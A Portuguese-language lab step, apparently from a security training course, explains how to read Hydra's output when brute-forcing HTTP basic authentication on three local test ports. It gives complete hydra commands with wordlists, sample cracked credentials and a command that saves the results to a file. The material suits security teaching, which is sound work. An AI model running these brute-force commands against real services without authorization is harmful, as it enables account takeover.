Verificar Saída para Múltiplos Hosts
Neste passo, você aprenderá a interpretar a saída do Hydra ao atacar vários alvos HTTP. A saída do Hydra fornece informações valiosas sobre o sucesso ou falha das tentativas de ataque em diferentes serviços web.
Quando o Hydra quebra com sucesso uma senha de autenticação básica HTTP, ele exibe as credenciais no seguinte formato:
[<porta>][http-get] host: <host> login: <nome_de_usuário> password: <senha>
Por exemplo:
[8081][http-get] host: 127.0.0.1 login: admin password: password123
Isso indica que o Hydra quebrou com sucesso a autenticação básica HTTP para o usuário admin no host 127.0.0.1 na porta 8081, com a senha password123.
Vamos analisar a saída de ataques HTTP e entender o que diferentes resultados significam.
-
Execute novamente o comando completo do ataque Hydra para ver a saída completa:
cd ~/project
hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get /
-
Examine a saída detalhada. Você deve ver resultados para todos os três alvos:
Saída completa esperada:
Hydra v9.x (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-XX-XX XX:XX:XX
[DATA] max 8 tasks per 1 server, overall 24 tasks, 60 login tries (l:4/p:5), ~3 try per task
[DATA] attacking http-get://127.0.0.1:8081:80/
[DATA] attacking http-get://127.0.0.1:8082:80/
[DATA] attacking http-get://127.0.0.1:8083:80/
[8081][http-get] host: 127.0.0.1 login: admin password: password123
[8082][http-get] host: 127.0.0.1 login: user password: secret
[8083][http-get] host: 127.0.0.1 login: testuser password: password
1 of 3 targets completed, 3 valid passwords found
Hydra finished.
-
Para ver como as tentativas malsucedidas se parecem, vamos criar um cenário com algumas credenciais inválidas. Crie um novo arquivo de senha com senhas principalmente incorretas:
echo "wrongpass" > wrong_passwords.txt
echo "badpass" >> wrong_passwords.txt
echo "password123" >> wrong_passwords.txt ## Apenas uma senha correta
-
Execute o Hydra com saída detalhada para ver tentativas bem-sucedidas e malsucedidas:
hydra -L users.txt -P wrong_passwords.txt -t 4 -v -M targets.txt http-get /
Você verá a saída detalhada mostrando a tentativa bem-sucedida:
(Saída do Hydra com tentativas bem-sucedidas e malsucedidas)
-
Salve os resultados em um arquivo para análise posterior:
hydra -L users.txt -P passwords.txt -t 8 -M targets.txt http-get / -o hydra_results.txt
Verifique o arquivo de resultados:
cat hydra_results.txt
Como interpretar os resultados de ataques HTTP:
- Ataques bem-sucedidos: Linhas começando com
[porta][http-get] mostram descobertas bem-sucedidas de credenciais.
- Informação do alvo: Cada resultado bem-sucedido mostra o host, porta, nome de usuário e senha exatos.
- Estatísticas resumidas: A linha final mostra quantos alvos foram atacados e quantas senhas válidas foram encontradas.
- Tentativas malsucedidas: Com o modo detalhado, você pode ver cada tentativa de login malsucedida.
- Arquivos de saída: Usar
-o salva apenas os resultados bem-sucedidos em um arquivo para análise fácil.
Diferenças-chave de outros protocolos:
- Os ataques HTTP mostram o número da porta claramente nos resultados.
- Os tempos de resposta geralmente são mais rápidos do que os ataques SSH.
- Múltiplos reinos de autenticação no mesmo servidor apareceriam como alvos diferentes.
- Códigos de status HTTP (como 401, 403) fornecem contexto adicional sobre falhas.
Neste passo, você aprendeu a interpretar a saída do Hydra ao atacar vários alvos HTTP, entender a diferença entre tentativas bem-sucedidas e malsucedidas e salvar resultados para análise. Este conhecimento é crucial para testes eficazes de segurança de aplicativos web.